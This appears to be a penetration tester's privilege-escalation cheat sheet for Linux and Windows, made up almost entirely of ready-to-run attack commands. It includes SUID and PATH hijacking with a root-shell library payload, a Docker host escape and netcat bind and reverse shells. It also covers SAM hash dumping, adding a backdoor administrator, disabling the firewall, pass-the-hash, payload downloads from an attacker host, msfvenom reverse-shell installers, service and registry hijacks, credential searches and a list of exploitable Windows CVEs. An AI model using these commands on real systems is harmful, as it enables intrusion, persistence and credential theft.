cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Find SUID Files

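find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the owner of the directory or of a file can delete or rename inside it
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - runs as the group, not the user who started it
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - runs as the owner, not the user who started it

find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID < full search (parentheses: otherwise -type f binds only to the -u=s side)
for i in $(locate -r "bin$"); do find "$i" \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin < quicker

# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

find / -perm /u=s -user "User name that you are looking for" 2>/dev/null    # -perm (the dash was missing)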

Writable file and nobody files

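find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writable directories without the sticky bit (anyone can delete/rename files in them)
find /dir -xdev \( -nouser -o -nogroup \) -print   # files with no valid owner / group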

Writable by current user

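find / -perm /u=w -user "$(whoami)" 2>/dev/null
find / -perm /u+w,g+w -type f -user "$(whoami)" 2>/dev/null    # -type f (find has no -f option)
find / -perm /u+w -user "$(whoami)" 2>/dev/null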

Any script files that we can modify?

find / -writable -type f -name "*.py" 2>/dev/null     #find all python file that can be write by us  

ls -aRl / | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone  
ls -aRl / | awk '$1 ~ /^..w/' 2>/dev/null       # Owner  
ls -aRl / | awk '$1 ~ /^.....w/' 2>/dev/null    # Group  
ls -aRl / | awk '$1 ~ /w.$/' 2>/dev/null        # Other  

find / -readable -type f 2>/dev/null               # Anyone  
find / -readable -type f -maxdepth 1 2>/dev/null   # Anyone 

Any service running by root?

ps aux|grep "root"  

/usr/bin/journalctl (Which is normally not readable by a user) << cron job?

Find password

grep -rnw '/' -ie 'pass' --color=always  
grep -rnw '/' -ie 'DB_PASS' --color=always  
grep -rnw '/' -ie 'DB_PASSWORD' --color=always  
grep -rnw '/' -ie 'DB_USER' --color=always 

Interesting files

Files modified in the last 5 mins
find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null

Sqlite DB files
find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null

All hidden files 
find / -type f -iname ".*" -ls 2>/dev/null

Scrtips in PATH 
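IFS=: read -ra path_dirs <<< "$PATH"
for d in "${path_dirs[@]}"; do find "$d" -name "*.sh" 2>/dev/null; done            # shell scripts in PATH
for d in "${path_dirs[@]}"; do find "$d" -type f -executable 2>/dev/null; done     # every executable in PATH (-type f, not -type -f)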

Backup files 
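find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*.bak" -o -name "*.bck" -o -name "*.bk" \) 2>/dev/null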

Exploitation techniques


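find / -perm -4000 -type f -exec ls -la {} + 2>/dev/null    # -exec needs a terminator (+ or \;); + batches the ls calls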
Check GTFOBins

Is suid bit set on these applications?

    nmap -V     <Nmap version 2.02 - 5.21 had an interactive mode  
    nmap --interactive  
    nmap> !sh  
    Modify system file, e.g. passwd?  
    - Press ESC key  
    :set shell=/bin/sh  
    touch pentestlab  
    find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;  
    bash -p      
    less /etc/passwd  

    Can you modify system file?  
    Modify /etc/sudoers (e.g. via a SUID editor)  
    \<user> ALL=(ALL) NOPASSWD:ALL  
    Use cp to overwrite passwd with a new password  

Is there a custom SUID / SUDO application?

How can this application be run?
Can be modify the path variable so that it will execute something else

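find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null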

Operation of this application 
#Look for scripts, operation, relative paths, permissions 
strings customapp 

#Loading shared libararies – use strace to trace a suid file and check for non existent lib files. Compile a lib file in C and put it in the missing location 
strace /usr/local/bin/customapp 2>&1 | grep -i -E "open|access|no such file"
strace /usr/local/bin/customapp 
------Below can be used to compile----
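#include <stdio.h>
#include <stdlib.h>

/* Runs automatically when the library is loaded, i.e. as soon as the SUID binary maps the "missing" .so. */
static void inject() __attribute__((constructor));

void inject() {
    /* we run with the SUID owner's euid: copy bash, make it SUID, enter it with -p so the euid is kept */
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}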
gcc -shared -o /home/user/missing.so -fPIC /home/user/missing.c

#Check for SUID binarys/applications vulnerable to symlink attacks
> check for nginxroot vulnerability 

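#PATH hijacking
strings /usr/local/bin/suid-env
## if a relative path is used (e.g. "service apache2 start"), a binary of that name earlier in PATH wins
## includes added: recent gcc rejects the implicit setuid/setgid declarations
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH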

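## If the full path is specified in the SUID binary, we can still define a bash function with that name and export it
## (only works when the binary runs the command through bash, and reportedly only on bash older than 4.2-048, which later refused to import functions named like paths)
function /usr/sbin/serviceX() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/serviceX

## Second method: with xtrace on, bash expands PS4 before every command, so the command substitution runs with the SUID privileges (reportedly fixed in bash 4.4, which drops the privileges first)
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'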

NFS priv esc


Linux capability

find / -type f -print0 2>/dev/null | xargs -0 getcap 2>/dev/null
getcap -r /
getcap -r / 2>/dev/null
# If we find cap_dac_read_search # read anything 
# cap_setuid+ep # setuid 
google that capability on how it can help us get root

Mysql run by root

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library

You can also try
select sys_exec('echo test>/tmp/test.txt');
select sys_eval('echo test>/tmp/test.txt');

Docker group

docker run -it --volume /:/mnt alpine:latest chroot /mnt

With the host filesystem mounted at /mnt, /mnt/etc/passwd (or /mnt/etc/shadow, root's authorized_keys) can be overwritten to gain root on the host

SSH bad keys attack

If authorized_keys is readable, look the public key up in the "debian-ssh" (Debian weak-key / CVE-2008-0166) collection on GitHub, which contains the matching private keys – see PayloadsAllTheThings



Windows Command Stash

Dump hashes

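REM needs an elevated shell: the SAM, SYSTEM and SECURITY hives are only readable as Administrator/SYSTEM
reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security

REM on the attacker box: SYSTEM holds the boot key that decrypts the SAM; SECURITY adds LSA secrets / cached domain creds
secretsdump.py -sam sam -system system -security security LOCAL > hashes.txt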

Add RDP user

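REM creates an obvious artefact and puts a cleartext password in the command history; remove it afterwards with: net user hacker /delete
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD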

Turn off firewall

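REM disables the firewall on all profiles - noisy and leaves the box exposed; re-enable with: NetSh Advfirewall set allprofiles state on
NetSh Advfirewall set allprofiles state off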

Pass the hash

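# -U is DOMAIN/user%LMHASH:NTHASH on one line (the hash was wrapped in the original); the target goes as //IP before the command
pth-winexe -U 'JEEVES/administrator%aad3b43XXXXXXXX35b51404ee:e0fb1fb857XXXXXXXX238cbe81fe00' //<TARGET-IP> cmd.exe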

Ping test blind rce

C:\Windows\System32\cmd.exe /c ping
# on linux box: 
tcpdump -i tun0 icmp

Ping test blind rce like above check if x64 powershell exists

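C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -c "ping <ATTACKER-IP>"    # SysNative is how a 32-bit process reaches the 64-bit System32 (and its 64-bit PowerShell)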

Download files

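certutil.exe -urlcache -split -f http://<ATTACKER-IP>/nc64.exe C:\Users\Public\nc64.exe

# the original line was truncated; DownloadFile takes (url, destination path)
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<ATTACKER-IP>/file.exe','C:\Users\Public\file.exe')"

powershell iwr -uri http://<ATTACKER-IP>/ch.exe -outfile ch.exe # also works in PS ConstrainedLanguageMode

# expand.exe copies a file from an attacker SMB share (a built-in copy primitive; see LOLBAS)
expand \\<ATTACKER-IP>\share\watson.exe C:\Users\Public\watson.exe

bitsadmin /transfer debjob /download /priority normal http://<ATTACKER-IP>/watson.exe C:\Users\Public\watson.exe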


certutil.exe -hashfile Taihou64.exe MD5

Alternate Data streams

dir /R file.txt - to check 
expand hm.txt:root.txt root.txt
powershell -command " Get-Content C:\ADS\1.txt -Stream file.exe -Raw"

List directory permissions (win server 2003)

icacls c:\*. /C

List alternate data stream files

dir /r

Mount windows account share using cifs, “ACCT here is account share name”

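sudo mount -t cifs -o username=Finance //<IP>/ACCT /mnt/win_share/    # prompts for the password instead of putting it on the command line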

Mount vhd file from share

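sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /path/to/mount/directory    # --ro (two dashes) keeps the image unmodified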

Dump password policy to prepare wordlist for password spray if smb null authentication allows domain enumeration.

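crackmapexec smb <TARGET-IP> --pass-pol -u '' -p ''    # null session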

Check account lock policy before password spraying smb

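crackmapexec smb <TARGET-IP> --pass-pol    # lockout threshold and observation window tell you how many guesses per user are safe per window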

Windows Exploits



#Security Bulletin   #KB     #Description    #Operating System

  • CVE-2020-0787 [Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability] (Windows 7/8/10, 2008/2012/2016/2019)
  • CVE-2020-0796 [A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka ‘Windows SMBv3 Client/Server Remote Code Execution Vulnerability’] (Windows 1903/1909)
  • CVE-2019-1458 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016)
  • CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019)
  • CVE-2018-8639 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016)
  • CVE-2018-1038 [Windows Kernel Elevation of Privilege Vulnerability] (Windows 7 SP1/Windows Server 2008 R2 SP1)
  • CVE-2018-0743 [Windows Subsystem for Linux Elevation of Privilege Vulnerability] (Windows 10 version 1703/Windows 10 version 1709/Windows Server version 1709)
  • CVE-2018-8453 [An elevation of privilege vulnerability in Windows Win32k component] (>= windows 8.1)
  • CVE-2018-8440 [Windows ALPC Elevation of Privilege Vulnerability] (windows 7/8.1/10/2008/2012/2016)
  • MS17-017  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)
  • CVE-2017-8464  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
  • CVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
  • CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
  • CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
  • MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
  • MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)
  • MS16-111  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)
  • MS16-098  [KB3178466]  [Kernel Driver]  (Win 8.1)
  • MS16-075  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
  • MS16-034  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)
  • MS16-032  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
  • MS16-016  [KB3136041]  [WebDAV]  (2008/Vista/7)
  • MS16-014  [K3134228]  [remote code execution]  (2008/Vista/7)
  • MS15-097  [KB3089656]  [remote code execution]  (win8.1/2012)
  • MS15-076  [KB3067505]  [RPC]  (2003/2008/7/8/2012)
  • MS15-077  [KB3077657]  [ATM]  (XP/Vista/Win7/Win8/2000/2003/2008/2012)
  • MS15-061  [KB3057839]  [Kernel Driver]  (2003/2008/7/8/2012)
  • MS15-051  [KB3057191]  [Windows Kernel Mode Drivers]  (2003/2008/7/8/2012)
  • MS15-015  [KB3031432]  [Kernel Driver]  (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
  • MS15-010  [KB3036220]  [Kernel Driver]  (2003/2008/7/8)
  • MS15-001  [KB3023266]  [Kernel Driver]  (2008/2012/7/8)
  • MS14-070  [KB2989935]  [Kernel Driver]  (2003)
  • MS14-068  [KB3011780]  [Domain Privilege Escalation]  (2003/2008/2012/7/8)
  • MS14-058  [KB3000061]  [Win32k.sys]  (2003/2008/2012/7/8)
  • MS14-066  [KB2992611]  [Windows Schannel Allowing remote code execution] (VistaSP2/7 SP1/8/Windows 8.1/2003 SP2/2008 SP2/2008 R2 SP1/2012/2012 R2/Windows RT/Windows RT 8.1)
  • MS14-040  [KB2975684]  [AFD Driver]  (2003/2008/2012/7/8)
  • MS14-002  [KB2914368]  [NDProxy]  (2003/XP)
  • MS13-053  [KB2850851]  [win32k.sys]  (XP/Vista/2003/2008/win 7)
  • MS13-046  [KB2840221]  [dxgkrnl.sys]  (Vista/2003/2008/2012/7)
  • MS13-005  [KB2778930]  [Kernel Mode Driver]  (2003/2008/2012/win7/8)
  • MS12-042  [KB2972621]  [Service Bus]  (2008/2012/win7)
  • MS12-020  [KB2671387]  [RDP]  (2003/2008/7/XP)
  • MS11-080  [KB2592799]  [AFD.sys]  (2003/XP)
  • MS11-062  [KB2566454]  [NDISTAPI]  (2003/XP)
  • MS11-046  [KB2503665]  [AFD.sys]  (2003/2008/7/XP)
  • MS11-011  [KB2393802]  [kernel Driver]  (2003/2008/7/XP/Vista)
  • MS10-092  [KB2305420]  [Task Scheduler]  (2008/7)
  • MS10-065  [KB2267960]  [FastCGI]  (IIS 5.1, 6.0, 7.0, and 7.5)
  • MS10-059  [KB982799]   [ACL-Churraskito]  (2008/7/Vista)
  • MS10-048  [KB2160329]  [win32k.sys]  (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
  • MS10-015  [KB977165]   [KiTrap0D]  (2003/2008/7/XP)
  • MS10-012  [KB971468]  [SMB Client Trans2 stack overflow]  (Windows 7/2008R2)
  • MS09-050  [KB975517]   [Remote Code Execution]  (2008/Vista)
  • MS09-020  [KB970483]   [IIS 6.0]  (IIS 5.1 and 6.0)
  • MS09-012  [KB959454]   [Chimichurri]  (Vista/win7/2008/Vista)
  • MS08-068  [KB957097]   [Remote Code Execution]  (2000/XP)
  • MS08-067  [KB958644]   [Remote Code Execution]  (Windows 2000/XP/Server 2003/Vista/Server 2008)
  • MS08-066  [KB956803]   [AFD.sys]  (Windows 2000/XP/Server 2003)
  • MS08-025  [KB941693]   [Win32.sys]  (XP/2003/2008/Vista)
  • MS06-040  [KB921883]   [Remote Code Execution]  (2003/xp/2000)
  • MS05-039  [KB899588]   [PnP Service]  (Win 9X/ME/NT/2000/XP/2003)
  • MS03-026  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)

Windows Privesc

Windows Privilege Escalation

Check OS, patch level, basics

Systeminfo | findstr /B /C:"OS Name" /C:"System Type"  etc .. 
## Updates
wmic qfe get Caption,Description,HotFixID,InstalledOn
Wmic logicaldisk get caption,description 

wmic product get name, version, vendor
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

sc query state=all | findstr "SERVICE_NAME:"
wmic service get name,displayname,pathname,startmode 
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

## Volume

## Drivers - in powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

echo %USERNAME%  

whoami /priv
whoami /groups 
whoami /all
# If user has SeImpersonate privs 
# \\\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c  \\\test\nc.exe -e cmd.exe 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} 

net user  
net localgroup  
net user /domain  
net group /domain  
net group /domain <Group Name> 

Firewall / AV / Defender

netsh firewall show state  
netsh firewall show config  
Sc query windefend
Netsh advfirewall firewall dump, netsh firewall show state


ipconfig /all  
route print  
arp -A 

Checklist: automated tools

Run winpeas 
Run PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-AllChecks"

Run Sherlock.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Find-AllVulns"

accesschk.exe /accepteula -wvu
Folder Perms 
\\\test\accesschk.exe /accepteula -uwdqs "Authenticated Users" C:\
\\\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\
File Perms 
\\\test\accesschk.exe /accepteula -uwqs  "Authenticated Users" C:\*.*
\\\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\*.*


# Executables  
WinPEAS.exe /.bat * 
Watson.exe * 
windows-privesc-check2.exe --dump -G

Sherlock.ps1 * 
PowerUp.ps1 * 
jaws-enumps1 * 

Windows-exploit-suggester.py *
Save the systeminfo output to a text file and run it through windows-exploit-suggester.py; search for the suggested exploit in the SecWiki GitHub repository

MSF exploit suggester *
In a meterpreter session, run post/multi/recon/local_exploit_suggester -> lists candidate local (kernel) exploits

Installed applications and services

# map running processes to started services
tasklist /SVC
# Windows services that are started
net start
#Look for 3rd party drivers 

# Check if WMIC is allowed in a low-privilege shell. Mostly allowed on Win7/Win8
 wmic /?
Automated WMIC info - https://www.fuzzysecurity.com/tutorials/files/wmic_info.rar 
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

#Check directory permissions 
cacls "C:\Python27"

Scheduled Tasks

schtasks /query /fo LIST /v  # Copy to schtasks.txt on local and run 
-> cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM  

dir %SystemRoot%\Tasks  

e.g. c:\windows\tasks\  
e.g. c:\windows\system32\tasks\  

# If we have write permissions on the scheduled task's binary or its directory
accesschk.exe -dqv "E:\GrabLogs"
copy evil-tftp.exe E:\GrabLogs\tftp.exe

Startups and autoruns

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Check access on the files and directories using accesschk; if writable, we can write a malicious binary there
accesschk64.exe /accepteula -wvu "C:\Program Files\Autorun Program"

Service Permissions

Check if service config can be modified

accesschk.exe /accepteula  
accesschk.exe -uwcqv "Authenticated Users" * /accepteula  
accesschk.exe -ucqv \<Service Name>  

sc qc \<Service Name>  #  Get service details 

Check service with weak file permission

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"  

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt  
FOR /F %i in (Servicenames.txt) DO echo %i  
type Servicenames.txt  
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt  
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

Unquoted Service Path

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  

sc query  
sc qc service name 

AlwaysInstallElevated << on 64-bit systems use: %SystemRoot%\Sysnative\reg.exe

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\

Check for AlwaysInstallElevated = 1 in both the HKLM and HKCU keys; if set in both, create an msfvenom MSI payload
msfvenom -p windows/shell_reverse_tcp lhost= lport= -f msi -o setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi

Service only available from inside (forward it with plink)

netstat -ano  
upload plink.exe  
plink.exe -R "remote port":"local port"  root@"ipaddress"

Password in files

Check for savecred

cmdkey /list        << If there are entries, we may be able to use runas as the user who stored their credentials in Windows
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\IP\share\nc.exe -nv 80 -e cmd.exe" 

Can we find any SAM files?


findstr /si password *.txt  
findstr /si password *.xml  
findstr /si password *.ini  
Findstr /si password *.config 
findstr /si pass/pwd *.ini  

dir /s *pass* == *cred* == *vnc* == *.config*  

in all files  
findstr /spin "password" *.*  
findstr /spin "password" *.*  

Unattended config


dir /b /s unattend.xml  
dir /b /s web.config  
dir /b /s sysprep.inf  
dir /b /s sysprep.xml  
dir /b /s *pass*  

dir c:\*vnc.ini /s /b  
dir c:\*ultravnc.ini /s /b   
dir c:\ /s /b | findstr /si *vnc.ini 


### VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"  
reg query "HKCU\Software\TightVNC\Server"  

### Windows autologin  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  

### SNMP Parameters (the key path is HKLM\SYSTEM\CurrentControlSet\Services\SNMP; the query below has a stray backslash in "Current\ControlSet")
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"  

### Putty  
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"  

### Search for password in registry  
reg query HKLM /f password /t REG_SZ /s  
reg query HKCU /f password /t REG_SZ /s 


Check service registry key permissions
> Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
Look for access permissions granted to NT AUTHORITY\INTERACTIVE

Create a new Windows service binary; check the attack directory for the source (net user /add works)
> x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Point the service's ImagePath registry value at it
> reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
Execute using 
> sc start regsvc 

Unquoted Service Path Exploitation

## Case 1: SeShutdownPrivilege is listed in the whoami /priv output # it doesn't matter even if it shows Disabled

# Search for services that auto start:
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
# Search for non-standard services
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows"
# Potential unquoted service output example
Heisenburg Service   heisenburgsvc     "C:\Program Files\Heisenburg\The One Who\knocks.exe"        auto

# next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub-directories
icacls "C:\\"                         # or: .\accesschk.exe /accepteula -uwdq C:\
icacls "C:\Program Files"             # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files"
icacls "C:\Program Files\Heisenburg"  # or  .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg"

# Example output if (BUILTIN\Users or Everyone) has (W) or (F) on "C:\Program Files\Heisenburg":
#                  BUILTIN\Users:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:

# Create reverse shell binary and copy it accordingly
copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" 

# now reboot to have the service auto start 
shutdown /r /t 0

## Case 2: SeShutdownPrivilege is not available (no reboot possible), but we have (service_stop, service_start) permission on the service

# Search for services that has manual start mode and non-standard
wmic service get name,displayname,pathname,startmode | findstr /i "manual" | findstr /i /v "c:\windows"
# Potential unquoted service output example
Heisenburg Service   heisenburgsvc     "C:\Program Files\Heisenburg\The One Who\knocks.exe"        manual

# Check if we have service_stop, service_start privilege
.\accesschk.exe /accepteula -ucqv user heisenburgsvc

# next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub-directories
icacls "C:\\"                         # or: .\accesschk.exe /accepteula -uwdq C:\
icacls "C:\Program Files"             # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files"
icacls "C:\Program Files\Heisenburg"  # or  .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg"

# Example output if (BUILTIN\Users or Everyone) has (W) or (F) on "C:\Program Files\Heisenburg":
#                  BUILTIN\Users:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:

# Since there are spaces in "\The One Who\" in the path
# Windows will look for "\The.exe" first, then "\The One.exe", then "\The One Who.exe", and finally "\The One Who\knocks.exe"

# Create reverse shell binary and copy it accordingly

copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" 

# Start netcat listener to catch the reverse shell and start the service
net start heisenburgsvc # net stop heisenburgsvc first if the service is already running.

Weak service permissions Exploitation

# download accesschk.exe from here https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
# List access for all services
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" * # or: .\accesschk.exe /accepteula -uwcqv user *
# Example output, showing full access on a service:
# $ RW upnphost

# at least (service_change_config, service_start, service_stop) access is needed, service_all_access = full access

# If both conditions are met we can start exploiting this now.

# List current config for the service
sc qc upnphost
# check that START_TYPE is DEMAND_START and that SERVICE_START_NAME is a higher-privileged account
# $        START_TYPE         : 3   DEMAND_START
# ...
# ... 
# $        SERVICE_START_NAME : NT AUTHORITY\LocalService 
# change binpath to the payload you want to execute, e.g. a reverse shell via an uploaded nc.exe:
sc config "upnphost" binpath= "C:\WINDOWS\Temp\nc.exe 443 -e C:\WINDOWS\System32\cmd.exe"
# remove dependencies (if any)
sc config "upnphost" depend= ""
# make it run from system account
sc config "upnphost" obj= ".\LocalSystem" password= ""
# Start netcat listener to catch the reverse shell and start the service
net start "upnphost" # net stop "upnphost" first if the service is already running.

Weak Registry Permissions Exploitation

# Check permissions for an example service "upnphost"
Get-Acl HKLM:\System\CurrentControlSet\Services\upnphost | Format-List # PowerShell
# Example output; check whether NT AUTHORITY\INTERACTIVE has FullControl
# Access : Everyone Allow  ReadKey
#          NT AUTHORITY\INTERACTIVE Allow  FullControl
#          NT AUTHORITY\SYSTEM Allow  FullControl 
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\upnphost # same thing accesschk
# Example output for accesschk.exe:
#         KEY_ALL_ACCESS

# Check if we have service_stop, service_start privilege
.\accesschk.exe /accepteula -ucqv user upnphost

# If both conditions are met we can start exploiting this now.

# list current values of the service
reg query HKLM\System\CurrentControlSet\Services\upnphost
# example output:
# HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\upnphost
#     DisplayName    REG_SZ    @%systemroot%\system32\upnphost.dll,-213
#     ErrorControl    REG_DWORD    0x1
#     ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\svchost.exe -k LocalServiceAndNoImpersonation
#     ...

# update ImagePath to point to our reverse shell payload
reg add HKLM\System\CurrentControlSet\Services\upnphost /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\backdoor.exe /f
# Start netcat listener to catch the reverse shell and start the service
net start "upnphost" # net stop "upnphost" first if the service is already running.

Weak Service Executable File Permissions Exploitation

# verify that we can overwrite an existing service binary
icacls "C:\Program Files\Heisenburg\knocks.exe"  # or .\accesschk.exe /accepteula -uvwq "C:\Program Files\Heisenburg\knocks.exe"

# Example output if (BUILTIN\Users or Everyone) has (W) or (F) on "C:\Program Files\Heisenburg\knocks.exe":
#                  Everyone:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:

# backup original executable
copy "C:\Program Files\Heisenburg\knocks.exe"  C:\Temp\

# Create reverse shell binary and overwrite the existing one
copy /Y C:\Temp\backdoor.exe "C:\Program Files\Heisenburg\knocks.exe" 
# Start netcat listener to catch the reverse shell and start the service
net start "heisenburgsvc" # net stop "heisenburgsvc" first if the service is already running.

AlwaysInstallElevated privilege Escalation

# This will only work if both registry keys contain "AlwaysInstallElevated" value 0x1.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# if the conditions are met we can exploit this now

# generate reverse shell msi payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<MY-IP> LPORT=<MY-PORT> -f msi -o shell.msi

# copy the binary over to target, start a listener and exec
msiexec /quiet /qn /i C:\Temp\shell.msi

DLL hijacking

You can see the DLL search order on 32-bit systems below:
1 - The directory from which the application loaded
2 - 32-bit System directory (C:\Windows\System32)
3 - 16-bit System directory (C:\Windows\System)
4 - Windows directory (C:\Windows)
5 - The current working directory (CWD)
6 - Directories in the PATH environment variable (system then user)
As a low-privilege user we have little hope of placing a malicious DLL in 1-4; 5 is not an option here because we are dealing with a Windows service; but if we have write access to any of the directories in the Windows PATH, we win.
echo %path%
# We can check our access permissions with accesschk or cacls
accesschk.exe -dqv "C:\Python27"
cacls "C:\Python27"
